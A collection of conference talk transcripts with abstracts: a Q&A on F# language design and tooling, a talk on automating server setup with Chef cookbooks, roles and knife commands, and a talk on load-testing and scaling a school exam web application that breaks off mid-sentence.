Oh, so, yeah, so if you need an absence of data, then you use what's called an option type in F sharp, where it's, you know, if you have a string but it may not be there, so you use an option, okay, and that means when you use that string, you actually have to check first if it's none, then do something and if it's there, some, if there's something there, then do something else. But you actually have to put those explicit cases into your code and that means you will, you know, you actually have to think a little bit more about like what happens if it's not, if the data's not there, if the data's not ready, if the response hasn't come back, if the component isn't initialized yet or something like that. So you have to cope with those cases and that's what makes your code more robust is be able to do those cases explicitly. Yeah. Do you compare F sharp and O camel? I mean, I haven't got a slide particularly comparing those two, so, broadly speaking, F sharp is, they're different at the language level for how they do objects, for instance, F sharp has a dot net object system in it, O camel has a very interesting object system on its own. It's certainly different in interoperability characteristics. I've got a very similar core language in its core problem solving capabilities. F sharp has things like asynchronous programming. O camel has its own version of asynchronous programming. But I think the key difference for certainly this audience is F sharp runs on top of the dot net stack and just gets all the interoperability and VM characteristics that you get from that. But O camel is a great language that's used for, I wouldn't say, yeah. But I mean, for anyone interested in dot net programming, F sharp would be the place to start. Yeah, John. I've learned a huge amount about software and programming languages through doing F sharp. And yes, there would be things I would definitely do differently. Through type providers, I mean, type providers is a very interesting mechanism because you've seen the examples where we interoperate through to other programming languages with type providers. And I would actually probably design F sharp to be a little further away from dot net and it just happens through one instantiation of it would be to interoperate with dot net. Okay. And so we would actually probably access the dot net libraries through the type provider mechanism, for example. So that's one area. I think the, there's a couple of places where I think we've got, F sharp both has records and class types. Okay. And I think we would bring those still further together, closer together. And I would actually think we may try and get that done in a future release of F sharp at some point, just keep bringing those concepts, simplifying and reducing the number of concepts in the language. There's, some of the complexity in the language has sort of flowed in from the outside. It's very, very tricky to get the balance right. So take for instance F sharp doesn't support partial classes. It doesn't really fit well with the model in F sharp. But it's an example where if we had done it, we'd have a more complex language which would be less satisfying, but we'd be able to interoperate just a little bit more with the dot net world. And I'm kind of glad we haven't done it, but we almost got forced to do it. So there's a lot of those edgy kind of decisions we've had like, and yeah, we probably got the call right on 95%, 98% of those. 
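Going back to the option-type answer above, here's a minimal sketch of what that None/Some handling looks like; the lookup function and the data in it are hypothetical.

```fsharp
// A value that may be absent is an option, not a null.
let tryFindEmail name =
    if name = "alice" then Some "alice@example.org" else None

let greeting name =
    match tryFindEmail name with
    | Some email -> sprintf "Mail %s at %s" name email
    | None       -> sprintf "No address on file for %s" name
```

The point is that the absent case has to be handled explicitly at the match, rather than every caller defensively checking for null.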
There are some corner cases; if you look through F#, it's a very simple language in its core use. But there are edge cases around delegates or structs or .NET things which are kind of leaking in around the edges, which you don't notice for most of your programming. I think we might have let a couple too many of those things come into the F# language proper. But that's okay, it's not a big problem. Yeah, John. Absolutely; certainly not all financial software has to be correct. I do think the academic community, which both you and I have come from, does overrate correctness on the whole. But there are many, many kinds of software which are not covered by one of the situations I've talked about today, which tend to correspond to the ones where correctness does matter, in terms of getting correct code delivered, or correctness in the time-to-market, meeting-your-requirements sense. And I do think those correspond a little bit to the parts where functional programming isn't quite so effective in achieving goals. But I personally think there's a strong correlation between where correctness is important and where strongly typed functional-first programming is effective in practice. But yes, I agree with you: there are whole parts of the software industry where correctness is not as important as academics might think, but probably more important than practitioners might think. Okay. So, the next question was that, relative to C#, F# doesn't have great refactoring support and advanced tooling support in Visual Studio, and people coming from C# notice that. F# is in a sense up against an extremely hard competitor on the straight coding front with C#, because its tooling is just absolutely fantastic, especially when you put something like ReSharper into the mix as well. Whereas if you compare F#, say, to OCaml or some of these other languages, its tooling is, I think, fantastic. So what are we going to do about that at Microsoft? I would love to open that up much more to the community, to allow many more contributors to F# tooling. I don't know; concretely, it's hard to make that happen, because Visual Studio has to be done to a very high level of quality and we can't just allow arbitrary new stuff into the mix. So, yeah, I would love to open that up much more to allow many more contributors to do interesting things with F# refactoring and tooling. It's going to take us time to get there, and to work out how to do that, and what gets done in the core Visual Studio Visual F# team and what gets done on the outside. We've got a good balance with the community on just about everything else, but that one we still need to work on. The one good thing that comes from having a relatively minimal level of tooling in comparison to C# is that as you move to the other development environments, like Xamarin Studio or MonoDevelop or the web-based CloudSharper kind of thing, they're also a similar development experience. 
So even though things are a little bit more minimal, at least they're uniform across all these different environments. There can be something a little bit addictive about having a development environment that does absolutely everything for you, but with F# you feel like you can move into different settings without really feeling like you're missing all those crutches, as it were. The point made earlier about F# and the functional community being a bit academic, a bit mathematical: what can we do about it? Oh, I just ignore it. I just ignore that side of things. I find sometimes it's a matter of language. We have this feature called asynchronous workflows in F#, and that's a great name for it; there are mathematical names for that kind of feature, and we just choose a plain name instead. This stuff is not mathematical. This is code. It's simple, straight code that anyone can understand. You show F# code to a 10-year-old or a 15-year-old and it's just entirely natural to them, and it's not until we get our minds totally infected by some other programming language that people start to find it hard. Okay? I think it's also that the community has obviously been structured around where it's come from, but that's really de-emphasized in F#. The F# community is very practically minded, so we just remain very practical, very focused. One last question, I think. How are we doing for time? Yeah. I mean, that's the thing: there's Microsoft's view on F#, okay, which is mainly about data and code-oriented activities, which are mostly server-side or portable activities. So you can use portable components and use them on Windows Phone 8, for example, but not user interface. Microsoft's view on F# is not focused on user interface work, which is why you don't see it on all these client-side platforms like Windows 8 or Windows Phone 8. So, yeah.
|
Functional-first programming is now a standard technique in the software industry. But what does it mean to succeed with functional-first programming in real business situations? What sort of business problems is it applicable to, and why do those problems matter? What sort of benefits can you expect if you adopt functional-first programming? How do the business needs map through to features of languages such as F#? In this talk, we’ll take a fun walkthrough case studies, observations, anecdotes and hard-nosed revenue figures to answer these questions.
|
10.5446/51414 (DOI)
|
I guess I have to do this in English. Okay, so my name is Eiling. I'll talk to you about Chef. How many of you know what Chef is? So, almost everyone. How many of you have used it or played with it? Not so many, so, a few of you. I'll tell you a bit about myself just to set the stage. I used to be a more or less full-time consultant developer, but then I decided to do a start-up. So, I'm still a full-time developer, but I'm also now a full-time salesperson and the ops guy and everything. Running the software as a service is just me and another guy, so we have to maintain this and run this ourselves. At the moment we have four servers, one of each kind. The thing is, when running stuff on Amazon, the servers might just disappear one day. We ran into that with one of the servers, like six months ago; it just stopped working, and then you have to get it back up. You could have had some kind of snapshot, but that might have been with data in some kind of weird state. Or you could install everything manually on a fresh image, but then you have to remember how to do that. It takes some time, and most likely you would get it wrong; at least in a stressful situation, that can be difficult. And also, as our business grows, we hope to scale out and add redundancy, so then it's nice to have like a couple of each type of server, maybe. So, it's that need to be able to quickly recreate anything if something happens, and also to be able to scale out. I wanted to have this automated and make sure that it comes up again in the same state every time, so I had to find something I could do this with. Previously I worked with some guys who used Puppet. I guess my challenge with Puppet is that I read this book called Pulling Strings with Puppet, and it was all this stuff about how to circumvent the weird object model they made. Maybe they've changed that, but at some point it was very Ruby-like syntax, but it was not Ruby. So, it's like you have to learn a new language that looks like another language; it was a bit confusing. Chef, on the other hand, was just pure Ruby, and I already knew Ruby, so it seemed like a better fit to me. There are obviously different ways to run Chef. There's the hosted option; you can also install the hosted server in your own cloud. The hosted option provides you with a server that keeps the state and all the recipes and all the data that the different nodes will pull down. There is also an open source version, which is not as flexible; I think, if I understand it correctly, you have to sort of run the server on each node. And also there's this new thing called Amazon OpsWorks, which allows you to use the Chef recipes, but it's not necessarily the exact same thing. I'll touch a bit more on that, and there are probably a few other things as well. So, I went for the hosted Chef option. There's this company called Opscode where you can create an account, and you get the central Chef server. It's free for up to five nodes, so it's kind of easy to get started with. To get started, basically, what you typically do is go to this kind of template, boilerplate GitHub repo. I don't know if you can see this, maybe I should make it bigger. And you clone the repository. So, you would typically just go here and clone it, and you would end up with a folder structure, just like a few empty folders. 
And then you have to set it up so you can use this command line tool, which is called Knife. So, a Chef uses a knife. So, what you start doing, I'm going to show you my repository I'm using. So, you have this Knife file, which just sets up some paths and some basic config, which you download from Ops Code. And you download a few certificates, which allows you to talk to the server, and also, which I used when the clients or the nodes registered with the server. So, you set that up, and then you have a kind of a command line tool, which is called Knife, which you can give various commands. So, for example, you can run Knife node list, and it will list all the nodes. It will query the server and get back the nodes. So, you can see the same four servers here as I run on Amazon. There's a lot of commands, which you can use. So, you can create users, tags, roles, nodes, environments. You can SSH into the servers. I'll try to demo some of this. But the kind of the central concept is a cookbook. So, a cookbook tells you how to install some kind of service or package on your servers. These cookbooks, there are a lot of them out there in the wild. So, there are some that are more or less what they call like community cookbooks, which are kind of a more or less endorsed by ops code. There's also a lot of people just making their own cookbooks. So, if you need to install, let's see if I can show you this. So, if you need to install a service, anything really, it might be that the cookbook is already out there. So, you have stuff for installing various databases, servers, monitoring applications, different languages, everything. And there's several ways to install or select these cookbooks. A typical way is to do a knife cookbook install, and then it will download the cookbook from GitHub and do some kind of GitHub magic so it will make a branch and a tag or something and just kind of add the cookbook to your repository. So, that's what I started out with. But it became quite messy because it didn't sort of check the cookbooks into the repository. So, it was very tempting if I wanted to change something to just go directly into the cookbook and change the code. But then, when I commit that to my three and then if there's an update to that cookbook, it's kind of a merge conflict, which is, it can be quite painful to solve. So, I found this tool called Librarianchef, which basically allows you to just specify the cookbooks in a cheff file. So, when I, if I then run Librarianchef install, it will download the cookbooks into a folder, but it will clear them out each time so that you don't check it into the repository. You just kind of copy it locally and you add it to the githing or file so it's not committed. So, that sort of prevents you from just going in there and hacking, which is kind of neat. Obviously, sometimes you want to create your own cookbooks as well, so you can still do that, keep them in a separate folder. I thought I'd show you some, just a basic, so a cookbook. So, for example, I have the Apache cookbook here. You'll see it has a couple of folders. I'm not sure if you can see that, but it's, a cookbook typically has like an attributes folder with a lot of attributes. So, these are various configuration terms, which you then, like, there can override if you need to. I'll show you a bit about that soon. And it has a recipes folder. A recipe typically is the code that sort of are executed, which will actually install stuff on the server. 
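Stepping back to the librarian-chef approach for a moment, a minimal Cheffile sketch looks roughly like this; the cookbook names, versions and the git URL are just illustrative, not the exact ones from the repository shown in the talk.

```ruby
# Cheffile -- consumed by `librarian-chef install`, which fetches these
# cookbooks into a cookbooks/ folder that you keep out of version control.
site 'http://community.opscode.com/api/v1'

cookbook 'apache2'
cookbook 'nginx', '~> 1.4'
cookbook 'logrotate'
cookbook 'chef-client', :git => 'https://github.com/opscode-cookbooks/chef-client.git'
```

Because librarian-chef re-resolves and re-downloads everything on each install, the local cookbooks folder stays disposable, which is exactly what discourages hacking community cookbooks in place.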
So, inside a recipe, Chef has these kinds of built-in methods that you can use. Obviously, this is for Linux or Ubuntu, so it has this package thing, and that will basically do the apt-get install of Apache 2. And then it has a lot of these conventions which can tell it that something is a service and when to start it up. So, there are quite a lot of things here; you can look at that yourself as well. For example, it has this template feature, which will take a template from a templates folder, for example this one. This is using a standard Ruby ERB template. It's basically just text, and then you can use these tags to add custom stuff to it so it gets set up. Basically, these are typically all the files that Apache needs to work, and you can then override and change them here. So, that is the basic anatomy of a cookbook. There are a few other concepts as well. You have something called roles. If you noticed, I had four different servers: there's a web server, there's a server running the search engine, and there's a server that renders some documents. You describe that in a role. This is my base role, which is shared across all my node types. It has this thing called a run list, which basically specifies which cookbooks, and which recipes within each cookbook, to use. You can see I have, for example, the Chef client service recipe, which makes sure that the Chef client runs as a daemon on the server, a few monitoring things, and a basic log rotate recipe. This is what tells Chef which recipes to run when you run Chef on the server. And you can see here that I've overridden some attributes. These are the attributes you would typically find in the attributes folder in the cookbooks, and you can go in and override them for the various roles. There are a couple of other concepts. You have something called environments, which I'm not using at the moment; I'm just using the default environment. But this is typically where you would have a staging environment, a production environment and a test environment, and then you can specify different properties for different environments, at least in theory. And you also have this data bag concept, which is just another place to put configuration. This is a bit confusing, because some cookbooks use data bags and some use attributes, and it's a bit messy. For example, with Amazon OpsWorks, I think they would just remove the data bag concept completely. So, maybe this will disappear, or maybe you'll have recipes that are not compatible across the different flavors of Chef. There are a lot of possibilities and there are some conventions, but it's sort of up to the people who make the cookbooks whether they follow them or not. One thing to think about with data bags is that they have supported encryption; that's probably the reason we use them. Yeah, so, data bags support encryption, like you were saying, so they could be a safer place to store configuration. But that sort of requires that the recipes support it, I guess; there are meant to be some ways to work around that. So, that is the basic concept. 
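As a rough sketch of what a role like the base role described above looks like on disk, here's a cut-down example; the recipe names and attribute values are placeholders rather than the real ones from the talk.

```ruby
# roles/base.rb -- uploaded with `knife role from file roles/base.rb`
name 'base'
description 'Shared by every node type'

run_list(
  'recipe[chef-client::service]',   # keep the Chef client running as a daemon
  'recipe[logrotate]'
)

override_attributes(
  'chef_client' => {
    'interval' => 1800,             # how often the daemon wakes up (seconds)
    'splay'    => 300
  }
)
```

The run list is the ordered list of recipes Chef will apply, and the override block is where role-level values replace the defaults shipped in the cookbooks' attributes folders.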
I obviously have cookbooks that I've just used as-is, like the community ones, but then I also have my own, which I keep in a separate folder. For example, I have a web recipe here, which I use when I want to, well, basically set up my server so that I can deploy my application to it. It makes sure that the Nginx config and all the necessary libraries are there, and that the necessary directories are created with the correct permissions. It writes the database configuration file there. It fixes some more permissions. It also uses, and this is kind of a neat feature, something that some cookbooks expose called definitions. If I can find the monit cookbook here, you can see it has a definition called monit rc, and that's a definition that allows you to basically call a function from another cookbook. So you can say, okay, I want this file, with these parameters, which will monitor my application, and then the cookbook that you call is responsible for knowing which folder to use and all that. It's quite useful, so you don't have to duplicate configuration and you can reuse things a bit. So, that was that. Let's go back here. And the same thing here: log rotate also has a definition, which allows me to specify which files to log rotate. So, instead of putting this in the log rotate cookbook, where it doesn't really belong because that cookbook could be used on different servers, you put it locally in this cookbook, because it's more specific to that kind of server. So, that's that. I mentioned a bit about environments. They are also sometimes used as the first prefix in the attributes. If you look at this, I think I have this Elasticsearch thing here; sometimes they are used and sometimes they are not. So, I have this here, and you can see how I had to prefix the data bag with 'default', because otherwise it would not use the default environment. Here you can have different options for different environments, but that depends on whether the cookbook, when it reads the attributes, has a section that says: attributes, environment, then attribute name. Sometimes it's just the attribute name more or less directly. So, this can be a bit confusing sometimes. So, that is kind of the basics. The public cookbooks that are out there are sometimes very up to date and very configurable; sometimes they are totally out of date, or they are more or less just hard-coded without any configuration. That just depends on whoever made it and how many people contributed to it. So, you might have to either write it yourself, or you can fork it and fix whatever you need. I guess that is something that will just keep improving over time. I thought I'd show you a demo, so that may or may not work. This is to show you how it looks when you run Chef. Let's call this 10. I'm going to run this command here, which basically uses the knife tool and the ec2 subcommand of that knife tool to create a server on Amazon with this AMI ID, that's the image I want to use, with the user ubuntu, and I say it should have the base role, the web role, and then, yeah, another role. It should be a medium size, and these are the security groups and the name of that server. So, if everything goes okay, I tested this yesterday, it should first provision a server with Amazon. We can see if it tries to do that; it should pop up here soon as well if it works. So, there we are, something's going on. You can see here it's launching a new server, and once that server is up, it will SSH into it and start by first installing Chef. 
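A cut-down sketch of the kind of web recipe and definition calls described above might look like this; the paths, owners and parameters are placeholders, and the logrotate_app definition comes from the community logrotate cookbook.

```ruby
# my-cookbooks/web/recipes/default.rb -- illustrative only
%w[shared shared/config shared/log].each do |dir|
  directory "/var/www/myapp/#{dir}" do
    owner     'deploy'
    group     'deploy'
    mode      '0755'
    recursive true
  end
end

template '/var/www/myapp/shared/config/database.yml' do
  source 'database.yml.erb'
  owner  'deploy'
  mode   '0640'
end

# Definition exposed by the logrotate cookbook
logrotate_app 'myapp' do
  path      '/var/www/myapp/shared/log/*.log'
  frequency 'daily'
  rotate    14
end
```

In the demo run below, recipes along these lines are what Chef actually applies once the node has been bootstrapped.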
And then it will download all the cookbooks for the different roles assigned to it, and it will start running through the cookbooks in the order I defined in the role. It should first go through the base role, if I had it here, and just start working through those recipes. The thing about Chef is that when you run it, if it has already installed something or has already written a file, it won't write to it again, most of the time. It depends what you write; you can obviously execute custom scripts with Chef, and if you do execute a custom script that will always flip something back or forth, then it will keep changing. I did that with some permissions, where I first set the permissions at the start of the run and then changed them with a script at the end of the run. Then it always restarted my web server, because the web server was set to be restarted if that file changed. So it restarted every five minutes, and it took me a while to figure that out. But if you use the Chef-style methods, it should be idempotent, and it won't change stuff unless you ask it to. So, the server is hopefully coming up soon; then you can start to see how it runs through it. Obviously this can be quite powerful. It's just code, so you can do whatever you would do normally: you can refactor things, you can have classes and methods, you can loop over things, and you can do a lot of powerful stuff. It did take me a while to get up to speed. If you know Ruby from before, that helps. If you know your environment and a lot about operations, that obviously helps. Coming from a developer perspective, I'm sure I've broken some conventions, and I might not have set up the servers the perfect way. Sometimes you can be lucky: let's say I wanted to use Elasticsearch and I was like, oh, how do I install that? I found a cookbook and it sort of just worked the first time. Other times you have to really understand what you are installing and know which parameters to tweak. So, now you can see we've connected to the server. It then downloads and installs Chef, and it starts synchronizing the cookbooks, so it will start downloading the cookbooks. I guess what I forgot to mention is that the cookbooks in the folders here, when you check them out or put them in the folder, they are not on the server. You have to specifically upload the cookbook; you have to make sure that the cookbook is uploaded to the server. So, you can make changes locally, and you can keep them in the repository or not, but you have to upload them to the server. The same with the roles: if you change the roles, you have to do a 'role from file', and then you typically upload that role. So, the repository is not what is on the server; you have to upload things. Let's see how it's doing. You can see now it's starting to install stuff; it's now trying to install Nginx. What I've noticed, or experienced, is that if you have a Chef recipe, or a role and a complete run list, and you work on it one day and you run it and it works, the server comes up, and then you think, okay, I can just put this to sleep now and if I need it again I'll just bring it up; and then three months later you try to run it and something breaks. What can happen is that external dependencies change. 
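One way to keep a custom script like the permissions one above idempotent is to guard it so that it only runs when the state is actually wrong; here's a minimal sketch, with placeholder paths and users.

```ruby
# Guarding an execute resource so it only runs when ownership is wrong,
# instead of flipping state (and triggering restarts) on every Chef run.
execute 'fix-upload-permissions' do
  command 'chown -R deploy:deploy /var/www/myapp/shared/uploads'
  not_if  "test \"$(stat -c %U /var/www/myapp/shared/uploads)\" = deploy"
end
```

With a guard like that, the resource reports itself as up to date on later runs instead of changing something and notifying the web server to restart.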
On that point about external dependencies: for example, the operating system, when you ask it to install something, the mirrors that contain the binary files, or the packages, can have kind of expired because new versions have been released. So, what I've had to do a few times is refresh the mirror list, or update the package list, at the start of the Chef run. There is obviously a Chef cookbook for that as well. I'm not sure if I can show you that; I'm not sure where I have it now, but I'll search for it and find it later. So, external things can change. And also, obviously, if you run this every day, then you probably know the state of it, but if you just run it occasionally, things get kind of broken. Another thing, and I think this will successfully work now, is that at the end of the Chef run, the node will register itself properly with the server. So, if it were to crash halfway through, then you can be in a state where it's like, I don't know. Then it's probably better to just fix the bug and fire up a new server, instead of trying to continue where it crashed. So, you will potentially use a lot of instances; at least that's my experience. But that's easy and cheap these days. Let's see. So, this is not responding yet; hopefully it will. You can see there's quite a lot of stuff I'm installing. If you were to do this manually, or from memory or from notes, it would be hard to get it right. So, what I'm doing now, I'll show you the bootstrapping and I'll show you the first Chef run. This will also install Chef as a daemon. That's optional: you can just run Chef once on each server and it will just set it up to the initial state, or you can have the daemon running continuously. Then, if you push any changes to attributes or templates, it will automatically fetch that, say every five minutes or every half an hour, depending on what you set it to, and then apply it. So, that can be quite powerful, and quite dangerous as well; it depends. So, okay, now Nginx is responding. I haven't deployed the app to it, so that's why I got a 404. But you can see, it's just one command and you install the whole stack, and it's more or less ready to use. We can go into the server and I can show you what will happen if I run the Chef client again. I could have done this from my local machine as well, with the SSH command. So, now it runs through and processes, but as you can see it didn't really change anything; it just logged a lot of stuff. So, unless anything changes, it will just run through fairly quickly on the second and third run and so forth. As I mentioned, I've decided to keep deployment with the app. You can have Chef deploy for you as well; it can regularly check some tag in GitHub and pull it down, and maybe that's what you want if you want things to just automatically scale and deploy themselves. But you have to figure out what fits in the app and what fits in Chef; there are some trade-offs there. So, Windows. I spent a day with Jules trying to get things running on Windows; you probably know a lot more. You don't really have SSH on Windows, so you can use WinRM. If you saw the bootstrap command that I ran, well, I guess that might not work, but knife also has an SSH command where you can execute things. I think I have that here. So, this is another way to run the Chef client, and I can do that from my local machine. 
So I would say it's Knife SSH, then the name of the server, and then the command to run. On Windows this would be something like Knife WinRM, I think, and it would do more or less the same thing. What I remember from the Windows side is that you have to take restarts into account, because Windows needs to restart a lot when you install new things. The Chef run I showed you, with the bootstrap, would get halfway through and then decide "now I have to restart", come back up again and sort of continue — which adds some fun to it, I think. So there are a few things to think about there. A few other things I have experienced: Opscode, the hosted server, can be down sometimes. That hasn't really bothered me, because it never happened while I was setting up a server; it just means the Chef client can't contact it and will try again later. But if you really needed to spin up an instance at exactly that time, you would have a problem. I guess you can run a private Chef server and make sure that's up and running, but then you have another dependency to look after. The Chef client, or the daemon I have running, can get stuck or run out of memory. So I have a monitoring tool that watches Chef, and Chef makes sure the monitoring tool is running, so usually they're both up. But there's a failure mode where Chef breaks the monitoring config because I've committed something wrong, and then the monitoring stops and Chef stops and nothing really tells me whether they're running — apart from going into this page and seeing when they last checked in. You can see my servers here: two minutes since this one checked in, five minutes for that one. That's the Chef daemon checking in. What's a bit confusing is that you have a node, which is basically your server, but a node is also a client. So if I were to shut down this other server now, I would have to remember to delete it both as a client and as a node. Sometimes, if you terminate an instance and then spin it up again with the same name, it will run through almost everything and then crash at the end because the client name or node name already exists. That's a bit annoying, so remember to delete both. The packages I think I've mentioned. Chef is Ruby, so you would think it plays very nicely with Ruby — and I'm running a Ruby application — but ironically I had some issues there. When Chef starts up, I think it makes sure there's a Ruby version present, but at the time the Ruby version that came with Ubuntu was old, and you want another version to run your app in. Chef itself runs on Ruby, so you end up with Chef installing another version of Ruby, and it can get a bit messy. There are ways to do it, but what I ended up doing was basically creating an image from scratch: I manually go in, install the correct version of Ruby and one or two XML libraries that sometimes need to be installed, and then I make an image from that, and that is my base image. So Chef gets you almost from zero, but sometimes you have to make a few changes to the image before you can run it. I think it may be the same on Windows: the WinRM setup and the firewalls need to be configured manually, and then you can start with Chef.
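The knife calls being described are roughly of this shape — the node names, users and password below are hypothetical, and knife winrm comes from the knife-windows plugin:

    # Bootstrap a fresh Linux box over SSH and hand it a role:
    knife bootstrap web1.example.com -x ubuntu --sudo -r 'role[web]'

    # Run a command (for example another chef-client run) on matching nodes over SSH:
    knife ssh 'name:web1*' 'sudo chef-client' -x ubuntu

    # The Windows equivalent goes over WinRM instead of SSH:
    knife winrm 'name:win1*' 'chef-client' -x Administrator -P 'secret'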
So it's almost there, but not always. For me it was a fairly steep learning curve, because I had to understand the Chef concepts and how they work, and you also have to understand operations, the operating system, and all the various packages you install. Every time there is something new, you have to understand that too. If you already know that side, maybe it's not as hard. I think I've gone through quite a few things now. I can talk a bit about Amazon OpsWorks, because I had a look at it. What they've done is build a web interface where you can specify different types of nodes and applications, and you paste in what you would typically put in the roles here. You put those attributes into a form on the web, and then the only part that remains code is the recipes themselves. So they have abstracted away, or moved into the UI, the things that would otherwise be code here. You can take your cookbooks and hopefully they'll run on Amazon with OpsWorks, but the rest might not transfer. It will be interesting to see how the two affect each other over time — maybe some of these things are a bit over-engineered, I don't know. We'll find out. Maybe if anyone has questions we can take them now, or I can try to go deeper into something. Yes — yes, you can. I've been lazy, so I haven't tested my cookbooks, but yes, it's just code, so you can obviously stub things out. You can test it, but if you actually run it, it's more of an integration test, because it will really try to install things. So you can stub things out — I guess that's how you would write unit tests — and make sure the loop works, and that if this attribute is set then it does that, and so on. You can write tests for all of that. But I think people are still figuring out the best way to do this, because the real test is when you actually run it, right? You can obviously run it on Amazon, but you can also do it locally — I guess you can use something like Vagrant to test it. There are different ways to do this and people are exploring different options. Maybe you bring up an instance, get the list of properties, and check that it's correct. And yes, just for the record: cucumber-chef and ChefSpec — people are doing this, but it does involve infrastructure when you want the real end-to-end test, so that can be a bit tricky. But you can certainly test the code. Let me see if I have a good example of — yes, you can see here I've used some of the power of Ruby: I have a list of three different names, I loop over them, and then I call the built-in resource for creating a directory, writing out a template, and also setting up the monitoring definition. You could do this as a PowerShell script or a shell script as well, but it's nice to have it in code. Obviously you can extract a method out of this, and then maybe test it in other ways too. Any more questions or things you would like to see? I guess it's the last talk of the day, so it wouldn't hurt to finish early. If you have any questions, come up and I'll show you some stuff. Yeah, I guess that's it.
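The loop described near the end — a plain Ruby list driving Chef's built-in resources — would look something like this sketch; the names, paths and template are hypothetical:

    %w[reports uploads exports].each do |name|
      # One directory per job name.
      directory "/srv/app/#{name}" do
        owner "deploy"
        mode  "0755"
        recursive true
      end

      # One rendered config file per job name, from a shared template.
      template "/etc/app/#{name}.conf" do
        source "job.conf.erb"
        variables(:job => name)
      end
    end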
|
There's a reason Heroku is so popular. As developers we often prefer to focus on coding (and sometimes providing business value) over setting up and maintaining servers and infrastructure. Setting up a full stack with e.g. apache/nginx, containers/wrappers, permissions, monitoring, alerts etc. can be a daunting task if you have not experienced it before. Even more terrifying is the thought of having to do it all again (from memory, or some patchy notes) if the server crashes or you need to scale out horizontally. Tools such as Chef and Puppet allow you to document and execute the setup and maintenance of your servers with code. From a developer's perspective I'll show you how "easily" you can set up your own servers with Chef. I'll also share with you my experiences from using Chef for more than a year now. There are some nice tools like Librarian-Chef which help you keep your Chef repository cleaner and more organised. Finally I'll talk a bit about when you should reuse cookbooks/recipes from the community and when you should create your own.
|
10.5446/51416 (DOI)
|
Hello, can you hear me? I'm here today to talk about scaling web applications. I hope you're all still awake. My name is Gaute Magnussen; I'm a web developer and consultant here in Oslo for Webstep. If you want to talk about any of this afterwards, come and find me — there's contact information at the end, and there's a link to the slides where you can see everything; they're online already, so you can follow along in real time on your own computer. First, some background on how I ended up working on this. It started a year or so ago, when we wrote a prototype for a product that would deliver exams for school children over the internet. We wrote the prototype, it was sold to ten schools, about a thousand pupils took exams with it, and it worked great. It worked so well with ten schools that we kept going, and this year we have sold it to roughly 2,500 schools. They all go through it in a two-month window — about 150,000 pupils taking a test within two months. So we started thinking about what that means: we would have to handle roughly 1,000 requests per second. We started measuring, and we could handle about 20 requests per second. So how do we get there in two months? Going from about 20 requests per second to 1,000 is hard. We started by measuring — but first, a little theory. What is a scalable system? This is the Wikipedia definition: scalability is the ability of a system, a network or a process to handle a growing amount of work. It's not about raw speed, it's not about a particular technology, and it's not about one magic number of requests per second — it's about the system's ability to grow with the load. But that's not the whole story either. You can have fast performance for one user and fall over with two, and that's not scalable. And scalability doesn't come for free: even though my title suggests you can fix it by this afternoon, it needs more or less constant attention. To keep a system working under heavy load, you have to work for it. We followed a few simple guidelines. Avoid premature optimization. Focus on the macro level — meaning focus on the operations that consume the most resources. That's what we did: we tried to find out what the users actually spend the most time on and how the system uses its resources, so we could optimize those paths rather than just the parts we happened to know about. You have to know the code and know what is really going on — that's extremely important, because you shouldn't guess. If you guess, you might tune a part of the application that feels slow, but just because something is slow doesn't mean it's slow for the users, and it might not even be used that much. You have to be right about what actually runs, and about how slow it really is. So where do you start? You start by measuring. Measure everything that goes on in the system, measure all the usage. Use Google Analytics, New Relic, load tests and profilers, and base your decisions on what the users actually go through. How does the system behave now, before you start scaling? We had 20 requests per second and needed 1,000, so it was simply a matter of starting to understand the system and getting a baseline. We did this with New Relic, which you install on the server.
It works a bit like Google Analytics in that it tracks everything that goes on. We used blitz.io for load testing — a simple web-based service where you sign up for a month and run load tests against whatever you have. We also profiled: we used a profiler with a 30-day free trial, and it gave us a lot of good insight into our code. If you combine those three things, you get a lot of data to work with. New Relic gave us screenshots like this, where you can see which classes and which methods accumulate the most time in the app — which methods cost the users the most time. Blitz.io gave us charts like this, where you can see how the system behaves under load. In this scenario we ramped up to about 200 requests per second and it started to struggle a bit: a drop in how many requests per second got through, and an increase in load time for the users. Blitz.io is essentially curl on the web — for those of you who know curl from Unix, it just fires curl-style web requests, lots of them, and it has pretty much the same API as curl. There are alternatives, like Grinder, ApacheBench and the Visual Studio load tester, but we liked this one because it was simple. We felt we had very little time to do a lot of things, so we needed fast feedback and short iterations. One important thing is to have a short feedback loop: you should be able to deploy the system in a matter of minutes, if not seconds, and you should have a good test suite so that when you change something, you know the system is still operational. We just kept repeating this process: find the biggest bottleneck, fix it, measure again to see if it improved, and repeat — until we couldn't find anything more and we were good. We used production. We had no staging environment and didn't need one; we had a separate machine to begin with, identical to our production setup, and then we moved to doing it in production, so we could see how the system actually behaved there. It doesn't have to be that way, but it was convenient and a good way to start without setting up yet another set of machines. We used real data, both for how the users behave and use the system, and real machines. You should at least try to get data that is as close as possible to what the users will actually hit. Someone asked how we deployed — a separate version, or a versioned service? OK, so Jez Humble — there was a talk earlier today by Jez Humble — calls this the blue-green pattern: we would spin up another version of the system on the same machine. And of course, what we built was often not right the first time, so we rolled changes out to users quite early, because we wanted to see how they really performed. If you can do that, roll it out to a subset, compare it with your baseline, and see whether it actually helped in a real user scenario — you can measure all you want artificially, but real users are the only way to see that it actually works. And compare with the baseline; that's how you see whether you really improved anything. And be ready to roll back. That's really important: if you deploy something that causes errors for the users, roll back. In order to have easy deployment, you need easy rollback. When you scale with hardware, you have two options: scaling up or scaling out. You can see Mr. Ballmer here — a kind of scale-up.
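(As a point of reference for the curl-style load generation mentioned a moment ago: a local tool like ApacheBench can produce a similar burst from one line — the URL and numbers here are made up, not from the talk.)

    # 1,000 requests, 50 at a time, against a single URL
    ab -n 1000 -c 50 https://example.com/exams/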
Scaling up is usually good up to a point — scaling out with Mac Minis is probably not the best way to do it. Scaling out is more complex: it requires infrastructure, load balancing, harder deployment, and more servers to maintain. Scaling up, on the other hand, means throwing away your old hardware and buying a more expensive box, while scaling out lets you keep the old one and just put another next to it. Scaling up — bigger hardware — is the quick solution. When you don't know what else to do, you just buy more hardware. It's the fastest thing you can do, and it usually works pretty well up to a point. Redesigning your software is not quick: if your software isn't capable of scaling out, fixing that will cost you money and time. You can also buy extreme hardware: if the database is the thing that really hurts, buy a really fast Fusion-io SSD drive. That's ten times as fast as a normal SSD, and for a couple of thousand dollars you will scale really well, really fast. Scaling out with more hardware is kind of the fun part. You can take smaller steps and just add one machine at a time, but it requires more infrastructure. And of course, since most of us are Microsoft developers and use proprietary software, there are license costs. A lot of licenses are per machine, not per CPU or gigabyte of RAM, which makes pricing more complex in a Microsoft environment than when you're using Linux and open source. Here's how scaling up versus scaling out compares. It's a pretty old chart, but the cost of scaling up grows pretty much exponentially, while scaling out adds small 